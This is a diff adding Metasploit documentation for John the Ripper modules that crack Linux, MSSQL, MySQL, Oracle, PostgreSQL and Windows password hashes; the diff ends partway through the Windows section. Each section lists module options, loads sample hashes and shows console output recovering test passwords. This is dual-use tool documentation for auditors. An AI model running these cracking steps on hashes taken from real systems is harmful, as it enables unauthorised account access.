+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:00 DONE (2019-02-11 19:29) 0g/s 4206Kp/s 4206Kc/s 4206KC/s scandal..vagrant
+Session completed
+[*] Cracking descrypt hashes in single mode...
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 6681Kp/s 6681Kc/s 6681KC/s qt1902..tude1900
+Session completed
+[*] Cracking descrypt hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+Will run 8 OpenMP threads
+Warning: MaxLen = 20 is too large for the current hash type, reduced to 8
+Press 'q' or Ctrl-C to abort, almost any other key for status
+0g 0:00:00:05 DONE (2019-02-11 19:29) 0g/s 21083Kp/s 21083Kc/s 21083KC/s 73602400..73673952
+Session completed
+[*] Cracked Passwords this run:
+[+] des_password:password
+[+] des_passphrase:????????se
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_aix) > creds
+Credentials
+===========
+
+host  origin  service  public          private                   realm  private_type        JtR Format
+----  ------  -------  ------          -------                   -----  ------------        ----------
+                       des_passphrase  ????????se                       Password            
+                       des_passphrase  qiyh4XPJGsOZ2MEAyLkfWqeQ         Nonreplayable hash  des
+                       des_password    rEK1ecacw.7.c                    Nonreplayable hash  des
+                       des_password    password                         Password            
+
+```
@@ -0,0 +1,171 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Linux
+  based password hashes, such as:
+
+  * `DES` based passwords  
+  * `MD5` based passwords
+  * `BSDi` based passwords
+  * With `crypt` set to `true`:
+    * `bf`, `bcrypt`, or `blowfish` based passwords
+    * `SHA256` based passwords
+    * `SHA512` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+  The definition of `crypt` according to JTR and waht algorithms it decodes can be found
+  [here](https://github.com/magnumripper/JohnTheRipper/blob/ae24a410baac45bb36884d793c429adeb7197336/src/c3_fmt.c#L731)
+
+## Verification Steps
+
+  1. Have at least one user with an `des`, `md5`, `bsdi`, `crypt`, `blowfish`, `sha512`, or `sha256` password hash in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_linux```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CRYPT**
+
+   Include `blowfish` and `SHA`(256/512) passwords.
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:des_password hash:rEK1ecacw.7.c jtr:des
+creds add user:md5_password hash:$1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/ jtr:md5
+creds add user:bsdi_password hash:_J9..K0AyUubDrfOgO4s jtr:bsdi
+creds add user:sha256_password hash:$5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5 jtr:sha256,crypt
+creds add user:sha512_password hash:$6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1 jtr:sha512,crypt
+creds add user:blowfish_password hash:$2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe jtr:bf
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_linux 
+msf5 auxiliary(analyze/jtr_linux) > set crypt true
+crypt => true
+msf5 auxiliary(analyze/jtr_linux) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-5021-hqwf2h
+[*] Wordlist file written out to /tmp/jtrtmp20190211-5021-1ixz59k
+[*] Cracking md5crypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] md5_password:password
+[*] Cracking descrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] des_password:password
+[*] Cracking bsdicrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] bsdi_password:password
+[*] Cracking crypt hashes in normal wordlist mode...
+Warning: hash encoding string length 20, type id #4
+appears to be unsupported on this system; will not load such hashes.
+Warning: hash encoding string length 60, type id $2
+appears to be unsupported on this system; will not load such hashes.
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] des_password:password
+[+] md5_password:password
+[+] sha256_password:password
+[+] sha512_password:password
+[*] Cracking bcrypt hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] blowfish_password:password
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_linux) > creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                                             realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                                             -----  ------------        ----------
+                       bsdi_password      password                                                                                                   Password            
+                       des_password       password                                                                                                   Password            
+                       sha256_password    $5$MnfsQ4iN$ZMTppKN16y/tIsUYs/obHlhdP.Os80yXhTurpBMUbA5                                                    Nonreplayable hash  sha256,crypt
+                       md5_password       password                                                                                                   Password            
+                       md5_password       $1$O3JMY.Tw$AdLnLjQ/5jXF9.MTp3gHv/                                                                         Nonreplayable hash  md5
+                       bsdi_password      _J9..K0AyUubDrfOgO4s                                                                                       Nonreplayable hash  bsdi
+                       sha512_password    password                                                                                                   Password            
+                       blowfish_password  $2a$05$bvIG6Nmid91Mu9RcmmWZfO5HJIMCT8riNW0hEp8f6/FuA2/mHZFpe                                               Nonreplayable hash  bf
+                       sha512_password    $6$zWwwXKNj$gLAOoZCjcr8p/.VgV/FkGC3NX7BsXys3KHYePfuIGMNjY83dVxugPYlxVg/evpcVEJLT/rSwZcDMlVVf/bhf.1         Nonreplayable hash  sha512,crypt
+                       sha256_password    password                                                                                                   Password            
+                       des_password       rEK1ecacw.7.c                                                                                              Nonreplayable hash  des
+                       blowfish_password  password                                                                                                   Password            
+
+```
@@ -0,0 +1,152 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Microsoft
+  SQL based password hashes, such as:
+
+  * `mssql` based passwords
+  * `mssql05` based passwords
+  * `mssql12` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `mssql`, `mssql05` or `mssql12` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_mssql_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:mssql05_toto hash:0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908 jtr:mssql05
+creds add user:mssql_foo hash:0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254 jtr:mssql
+creds add user:mssql12_Password1! hash:0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16 jtr:mssql12 
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_mssql_fast 
+msf5 auxiliary(analyze/jtr_mssql_fast) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-u353o8
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-hcwr36
+[*] Cracking mssql05 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql05 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mssql05_toto:toto
+[+] mssql_foo:foo
+[+] mssql05_toto:toto
+[+] mssql_foo:foo
+[*] Cracking mssql hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mssql_foo:FOO
+[+] mssql_foo:FOO
+[*] Cracking mssql12 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mssql12 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mssql12_Password1!:Password1!
+[+] mssql12_Password1!:Password1!
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_mssql_fast) > creds
+Credentials
+===========
+
+host  origin  service  public              private                                                                                                                                         realm  private_type        JtR Format
+----  ------  -------  ------              -------                                                                                                                                         -----  ------------        ----------
+                       mssql05_toto        toto                                                                                                                                                   Password            
+                       mssql05_toto        0x01004086CEB6BF932BC4151A1AF1F13CD17301D70816A8886908                                                                                                 Nonreplayable hash  mssql05
+                       mssql_foo           FOO                                                                                                                                                    Password            
+                       mssql_foo           foo                                                                                                                                                    Password            
+                       mssql_foo           0x0100A607BA7C54A24D17B565C59F1743776A10250F581D482DA8B6D6261460D3F53B279CC6913CE747006A2E3254                                                         Nonreplayable hash  mssql
+                       mssql12_Password1!  Password1!                                                                                                                                             Password            
+                       mssql12_Password1!  0x0200F733058A07892C5CACE899768F89965F6BD1DED7955FE89E1C9A10E27849B0B213B5CE92CC9347ECCB34C3EFADAF2FD99BFFECD8D9150DD6AACB5D409A9D2652A4E0AF16         Nonreplayable hash  mssql12
+
+```
@@ -0,0 +1,134 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode MySQL
+  based password hashes, such as:
+
+  * `mysql` (pre 4.1) based passwords
+  * `mysql-sha1` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `mysql`, or `mysql-sha1` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_mysql_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:mysql_probe hash:445ff82636a7ba59 jtr:mysql
+creds add user:mysql-sha1_tere hash:*5AD8F88516BD021DD43F171E2C785C69F8E54ADB jtr:mysql-sha1
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_mysql_fast 
+msf5 auxiliary(analyze/jtr_mysql_fast) > run
+
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-o7pt47
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-3t366y
+[*] Cracking mysql hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mysql_probe:probe
+[*] Cracking mysql-sha1 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking mysql-sha1 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked Passwords this run:
+[+] mysql-sha1_tere:tere
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_mysql_fast) > creds
+Credentials
+===========
+
+host  origin  service  public           private                                    realm  private_type        JtR Format
+----  ------  -------  ------           -------                                    -----  ------------        ----------
+                       mysql_probe      probe                                             Password            
+                       mysql_probe      445ff82636a7ba59                                  Nonreplayable hash  mysql
+                       mysql-sha1_tere  tere                                              Password            
+                       mysql-sha1_tere  *5AD8F88516BD021DD43F171E2C785C69F8E54ADB         Nonreplayable hash  mysql-sha1
+
+```
@@ -0,0 +1,163 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode oracle
+  based password hashes, such as:
+
+  * `oracle` (<=10) aka `des` based passwords
+  * `oracle11` based passwords
+  * Oracle 11 and 12c backwards compatibility `H` field (MD5)
+  * `oracle12c` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+  For a detailed explanation of Oracle 11/12c formats, see
+  [www.trustwave.com](https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/changes-in-oracle-database-12c-password-hashes/).
+
+  Oracle 11/12c `H` field is `dynamic_1506` in JtR and added
+  [here](https://github.com/magnumripper/JohnTheRipper/commit/53973c5e6eb026ea232ba643f9aa20a1ffee0ffb)
+
+## Verification Steps
+
+  1. Have at least one user with an `oracle`, `oracle11`, or `oracle12c` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_oracle_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:simon hash:4F8BC1809CB2AF77 jtr:des,oracle
+creds add user:SYSTEM hash:9EEDFA0AD26C6D52 jtr:des,oracle
+creds add user:DEMO hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+creds add user:oracle11_epsilon hash:'S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C' jtr:raw-sha1,oracle
+creds add user:oracle12c_epsilon hash:'H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B' jtr:pbkdf2,oracle12c
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_oracle_fast 
+msf5 auxiliary(analyze/jtr_oracle_fast) > run
+
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-v6a8wg
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-123367o
+[*] Cracking oracle hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] simon:A
+[+] SYSTEM:THALES
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1skc10b
+[*] Cracking dynamic_1506 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1506 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1qwsyoy
+[*] Cracking oracle11 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle11 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] DEMO:epsilon
+[+] oracle11_epsilon:epsilon
+[*] Hashes Written out to /tmp/hashes_tmp20190211-6421-1f9piv4
+[*] Cracking oracle12c hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking oracle12c hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] oracle12c_epsilon:epsilon
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_oracle_fast) > creds
+Credentials
+===========
+
+host  origin  service  public             private                                                                                                                                                                                                                                                               realm  private_type        JtR Format
+----  ------  -------  ------             -------                                                                                                                                                                                                                                                               -----  ------------        ----------
+                       simon              A                                                                                                                                                                                                                                                                            Password            
+                       simon              4F8BC1809CB2AF77                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       SYSTEM             THALES                                                                                                                                                                                                                                                                       Password            
+                       SYSTEM             9EEDFA0AD26C6D52                                                                                                                                                                                                                                                             Nonreplayable hash  des,oracle
+                       DEMO               epsilon                                                                                                                                                                                                                                                                      Password            
+                       DEMO               S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle11_epsilon   epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle11_epsilon   S:8F2D65FB5547B71C8DA3760F10960428CD307B1C6271691FC55C1F56554A;H:DC9894A01797D91D92ECA1DA66242209;T:23D1F8CAC9001F69630ED2DD8DF67DD3BE5C470B5EA97B622F757FE102D8BF14BEDC94A3CC046D10858D885DB656DC0CBF899A79CD8C76B788744844CADE54EEEB4FDEC478FB7C7CBFBBAC57BA3EF22C         Nonreplayable hash  raw-sha1,oracle
+                       oracle12c_epsilon  epsilon                                                                                                                                                                                                                                                                      Password            
+                       oracle12c_epsilon  H:DC9894A01797D91D92ECA1DA66242209;T:E3243B98974159CC24FD2C9A8B30BA62E0E83B6CA2FC7C55177C3A7F82602E3BDD17CEB9B9091CF9DAD672B8BE961A9EAC4D344BDBA878EDC5DCB5899F689EBD8DD1BE3F67BFF9813A464382381AB36B                                                                        Nonreplayable hash  pbkdf2,oracle12c
+
+```
@@ -0,0 +1,126 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode PostgreSQL
+  based password hashes, such as:
+
+  * `postgres` based passwords
+  * `raw-md5` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+  PostgreSQL is a `raw-md5` format with the username appended to the password.  This format was
+  added to JtR as `dynamic_1034` [here](https://github.com/magnumripper/JohnTheRipper/commit/e57d740bed5c4f4e40a0ff346bcdde270a8173e6)
+
+## Verification Steps
+
+  1. Have at least one user with an `postgres`, or `raw-md5` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_postgres_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
+   The path to a John config file (JtR option: `--config`).  Default is `metasploit-framework/data/john.conf`
+
+   **CUSTOM_WORDLIST**
+
+   The path to an optional custom wordlist.  This file is added to the new wordlist which may include the other
+   `USE` items like `USE_CREDS`, and have `MUTATE` or `KORELOGIC` applied to it.
+
+   **ITERATION_TIMEOUT**
+
+   The max-run-time for each iteration of cracking
+
+   **JOHN_PATH**
+
+   The absolute path to the John the Ripper executable.  Default behavior is to search `path` for
+   `john` and `john.exe`.
+
+   **KORELOGIC**
+
+   Apply the [KoreLogic rules](http://contest-2010.korelogic.com/rules.html) to Wordlist Mode (slower).
+   Default is `false`.
+
+   **MUTATE**
+
+   Apply common mutations to the Wordlist (SLOW).  Mutations are:
+
+   * `'@' => 'a'`
+   * `'0' => 'o'`
+   * `'3' => 'e'`
+   * `'$' => 's'`
+   * `'7' => 't'`
+   * `'1' => 'l'`
+   * `'5' => 's'`
+
+   Default is `false`.
+
+   **POT**
+
+   The path to a John POT file (JtR option: `--pot`) to use instead.  The `pot` file is the data file which
+   records cracked password hashes.  Kali linux's default location is `/root/.john/john.pot`.
+   Default is `~/.msf4/john.pot`.
+
+   **USE_CREDS**
+
+   Use existing credential data saved in the database.  Default is `true`.
+
+   **USE_DB_INFO**
+
+   Use looted database schema info to seed the wordlist.  This includes the Database Name, each Table Name,
+   and each Column Name.  If the DB is MSSQL, the Instance Name is also used.  Default is `true`.
+
+   **USE_DEFAULT_WORDLIST**
+
+   Use the default metasploit wordlist in `metasploit-framework/data/wordlists/password.lst`.  Default is
+   `true`.
+
+   **USE_HOSTNAMES**
+
+   Seed the wordlist with hostnames from the workspace.  Default is `true`.
+
+   **USE_ROOT_WORDS**
+
+   Use the Common Root Words Wordlist in `metasploit-framework/data/wordlists/common_roots.txt`.  Default
+   is true.
+
+## Scenarios
+
+Create hashes:
+
+```
+creds add user:example postgres:md5be86a79bf2043622d58d5453c47d4860
+```
+
+Crack them:
+
+```
+msf5 > use auxiliary/analyze/jtr_postgres_fast 
+msf5 auxiliary(analyze/jtr_postgres_fast) > run
+
+[*] Hashes written out to /tmp/hashes_tmp20190211-6421-1hooxft
+[*] Wordlist file written out to /tmp/jtrtmp20190211-6421-1hv6clq
+[*] Cracking dynamic_1034 hashes in normal wordlist mode...
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in single mode...
+Using default input encoding: UTF-8
+[*] Cracking dynamic_1034 hashes in incremental mode (Digits)...
+Using default input encoding: UTF-8
+[*] Cracked passwords this run:
+[+] example:password
+[*] Auxiliary module execution completed
+msf5 auxiliary(analyze/jtr_postgres_fast) > creds
+Credentials
+===========
+
+host  origin  service  public   private                              realm  private_type  JtR Format
+----  ------  -------  ------   -------                              -----  ------------  ----------
+                       example  md5be86a79bf2043622d58d5453c47d4860         Postgres md5  raw-md5,postgres
+                       example  password                                    Password      
+
+```
@@ -0,0 +1,153 @@
+## Vulnerable Application
+
+  This module attempts to use [john the ripper](https://www.openwall.com/john/) to decode Windows
+  based password hashes, such as:
+
+  * `LM`, or `LANMAN` based passwords
+  * `NT`, `NTLM`, or `NTLANMAN` based passwords
+
+  Sources of hashes can be found here:
+  [source](https://openwall.info/wiki/john/sample-hashes), [source2](http://pentestmonkey.net/cheat-sheet/john-the-ripper-hash-formats)
+
+## Verification Steps
+
+  1. Have at least one user with an `nt` or `lm` password in the database
+  2. Start msfconsole
+  3. Do: ```use auxiliary/analyze/jtr_windows_fast```
+  4. Do: ```run```
+  5. You should hopefully crack a password.
+
+## Options
+
+
+   **CONFIG**
+
